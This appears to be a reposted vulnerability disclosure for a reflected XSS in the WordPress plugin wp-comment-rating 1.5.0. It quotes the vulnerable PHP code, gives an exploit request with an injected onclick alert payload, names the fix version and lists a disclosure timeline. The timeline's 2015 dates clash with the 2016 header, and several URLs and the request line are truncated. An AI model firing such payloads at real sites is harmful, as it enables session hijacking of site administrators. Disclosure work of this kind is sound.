#Product : wp-comment-rating
#Exploit Author : Rahul Pratap Singh
#Version : 1.5.0
#Home page Link :
http://codecanyon.net/item/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/
#Date : 30/Jan/2016
XSS Vulnerability:
------------------------------
Description:
------------------------------
"tab" parameter is not sanitized that leads to Reflected XSS.
------------------------------
Vulnerable Code:
------------------------------
File Name: wpb_plugin_admin_page.php
line:194
$this->current_tab = isset( $_GET['tab'] ) ? $_GET['tab'] : '';
line:553
$active_tab = $this->current_tab;
line:558
$active_tab = isset( $this->tabs[0] ) && empty( $active_tab ) ?
$this->tabs[0]->
get_id() : $active_tab;
line:561
<div class="wrap wrap-<?php echo $this->page_hook . ' active-tab-' .
$active_tab; ?>">
------------------------------
Exploit:
------------------------------
GET /wp-admin/edit-comments.php?
< input type=text onclick=alert(/XSS/)><!--
------------------------------
POC:
------------------------------
https://0x62626262.files.
Fix:
Update to 1.5.4
Vulnerability Disclosure Timeline:
→ January 24, 2015 – Bug discovered, initial report to Vendor
→ January 25, 2015 – Vendor Acknowledged
→ January 27, 2015 – Vendor Deployed a Patch
##############################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
##############################
Pub Ref:
https://0x62626262.wordpress.
http://codecanyon.net/item/
Komentarų nėra:
Rašyti komentarą